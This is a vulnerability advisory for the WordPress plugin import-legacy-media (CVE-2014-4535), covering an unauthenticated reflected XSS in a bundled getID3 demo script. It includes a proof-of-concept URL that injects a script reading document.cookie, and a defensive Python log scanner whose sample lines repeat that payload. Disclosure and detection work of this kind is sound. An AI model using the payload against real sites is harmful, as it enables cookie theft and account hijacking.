wp-plugin : import-legacy-media

Plugin Details
Plugin Name: wp-plugin : import-legacy-media
Affected Version : 0.1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
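
To check web server access logs for requests shaped like the PoC above, the following Python example flags hits on the demo script whose `filename` parameter decodes to HTML metacharacters. It is an added example, not part of the original advisory or the plugin's code. It assumes combined-format access log lines; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path taken from the PoC URL in this advisory.
DEMO_SCRIPT = "/getid3/demos/demo.mimeonly.php"
# Characters that let a reflected value leave an HTML attribute or text node.
HTML_META = re.compile(r"[<>'\"]")
# Request portion of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_filename(request_target):
    """Return the decoded filename value if it carries HTML metacharacters."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(DEMO_SCRIPT):
        return None
    # parse_qs percent-decodes the value once, as the server side would see it.
    for value in parse_qs(parts.query, keep_blank_values=True).get("filename", []):
        if HTML_META.search(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, decoded_value) for every flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_filename(match.group(1))
            if value is not None:
                yield number, value


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/May/2014:10:00:01 +0000] "GET /wordpress/wp-content/wp-plugs/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=song.mp3 HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/May/2014:10:00:05 +0000] "GET /wordpress/wp-content/wp-plugs/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 640',
    '192.0.2.12 - - [25/May/2014:10:00:09 +0000] "GET /wordpress/index.php?filename=%3Cb%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: filename={value!r}")
```

A hit only shows that such a request was received; whether the script is still reachable on a given installation has to be checked separately.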


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4535
Plugin Description :
The import lists all the files and folders in your web-site home directory. Navigate to sub-folders by clicking on 'folder' links. Files already in the Media Library are shown without a tickbox. Filters at the top of the file listing allow you to tick all the files, or just editable files. You can then also choose to untick 'old thumbnail' files. If there are other filters on file selection you would like to see, let me know on the [WP Forums](http://wordpress.org/tags/import-legacy-media?forum_id=10#postform). Files are imported with Title and Description data taken from (in order of precedence) ID3 tags, EXIF data, or the filename. Once you have selected the files you want imported click the 'Import Files' button. (This plugin comes complete with the getID3 PHP library in a sub-folder. The library can be found at http://www.getid3.org/.)

= Version History =
0.1 - Just starting out, something to get it working